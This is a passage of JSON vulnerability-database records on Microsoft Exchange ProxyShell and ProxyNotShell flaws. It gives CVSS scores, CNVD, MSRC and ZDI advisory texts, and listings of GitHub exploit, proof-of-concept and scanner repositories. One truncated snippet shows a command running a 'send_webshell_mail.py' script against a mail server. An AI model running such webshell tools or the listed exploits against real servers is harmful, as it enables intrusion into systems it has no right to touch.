{"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-09T15:27:40", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2023-09-16T21:57:19", "id": "62D6E584-1E80-5592-B12B-068A448438E2", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-08T08:21:02", "description": "# CVE-2022-41082-RCE-POC aka ProxyNotShell\nCVE-2022-41082 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T07:50:19", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-08T07:53:18", "id": "B8464218-31FA-569A-AC74-26B347DEC285", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-09-30T23:03:10", "description": "# -CVE-2022-41082-RCE\nPoC for CVE-2022-41082 RCE as known as Pro...", "cvss3": {}, "published": "2022-09-30T20:59:46", "type": "githubexploit", "title": "Exploit for CVE-2022-41082", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-09-30T21:01:47", "id": "6E208382-5651-5649-B6C1-F9EF3A08EA81", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-10-03T08:01:45", "description": "# CVE-2022-41040-RCE-POC aka ProxyNotShell\nCVE-2022-41040 Remote...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-03T05:05:11", "type": "githubexploit", "title": "Exploit for CVE-2022-41040", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-03T05:12:11", "id": "D58D53CD-D047-5570-B473-DEFF8E3B0225", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-08-11T21:33:34", "description": "# CVE-2022-41040\n# Microsoft Exchange vulnerable to server-side ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-14T17:01:17", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2023-03-23T04:20:35", "id": "3722FF3F-D30D-5D5C-802E-EEA4963C6848", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:33:27", "description": "- python send_webshell_mail.py https://mail16.echod.com aaa@echo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T07:47:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2023-09-16T21:49:11", "id": "0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:18:33", "description": "# CVE-2021-34473-NMAP-SCANNER\nA massive scanner for CVE-2021-344...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-16T08:22:29", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2023-05-06T05:33:04", "id": "2BEFA353-947D-5B41-AE38-EDB0C71B5B44", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-12T14:43:07", "description": "# ProxyShell_POC\nPOC for ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T07:29:24", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34523", "CVE-2021-31207", "CVE-2021-34473"], "modified": "2022-03-12T13:42:54", "id": "E458F533-4B97-51A1-897B-1AF58218F2BF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-03T01:31:20", "description": "# Proxyshell-Scanner\nnuclei scanner for Proxyshell RCE (CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T15:01:02", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34423"], "modified": "2022-03-02T12:56:33", "id": "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:01:02", "description": "# ProxyShell\nProof of Concept Exploit for Microsoft Exchange CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T15:34:03", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-23T18:03:46", "id": "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:18:47", "description": "# Contains Custom NSE scripts \n\n\n# CVE-2020-0796\nNSE script to d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T17:51:29", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1350", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-34473"], "modified": "2022-03-23T17:15:09", "id": "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "cnvd": [{"lastseen": "2022-10-11T00:07:43", "description": "Microsoft Exchange Server is a popular mail service program developed by Microsoft. Microsoft Exchange Server is vulnerable to an elevation of privilege vulnerability, which can be exploited by remote attackers to submit special requests that can obtain sensitive information or elevate privileges.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T00:00:00", "type": "cnvd", "title": "Microsoft Exchange Server Elevation of Privilege Vulnerability (CNVD-2022-67837)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-41040"], "modified": "2022-10-10T00:00:00", "id": "CNVD-2022-67837", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-67837", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-11T00:08:42", "description": "Microsoft Exchange Server is a popular mail service program developed by Microsoft. Microsoft Exchange Server has a security vulnerability that can be exploited by remote attackers to submit special requests that can execute arbitrary code via PowerShell in the context of an application.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-08T00:00:00", "type": "cnvd", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability (CNVD-2022-67838)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-41082"], "modified": "2022-10-10T00:00:00", "id": "CNVD-2022-67838", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-67838", "cvss": {"score": 0.0, "vector": "NONE"}}], "mscve": [{"lastseen": "2023-09-04T19:21:57", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41040"], "modified": "2022-11-08T08:00:00", "id": "MS:CVE-2022-41040", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41040", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-09-04T19:21:57", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-08T08:00:00", "id": "MS:CVE-2022-41082", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41082", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:37", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.9, "vectorString": "AV:A/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-31206", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31206", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:29", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-34473", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-14T15:25:37", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31206, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mscve", "title": "Microsoft Exchange Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-13T07:00:00", "id": "MS:CVE-2021-31196", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31196", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdi": [{"lastseen": "2023-05-23T15:49:57", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Autodiscover service. The issue results from the lack of proper validation of URI prior to accessing resources. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "zdi", "title": "(Pwn2Own) Microsoft Exchange Server Autodiscover Server Side Request Forgery Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34473"], "modified": "2021-07-19T00:00:00", "id": "ZDI-21-821", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-821/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-11T22:15:57", "description": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange. Authentication is required to exploit this vulnerability. The specific flaw exists within the FileConfigurationSource class. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-22T00:00:00", "type": "zdi", "title": "Microsoft Exchange FileConfigurationSource Exposed Dangerous Function Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-41082"], "modified": "2022-11-22T00:00:00", "id": "ZDI-22-1637", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-1637/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": 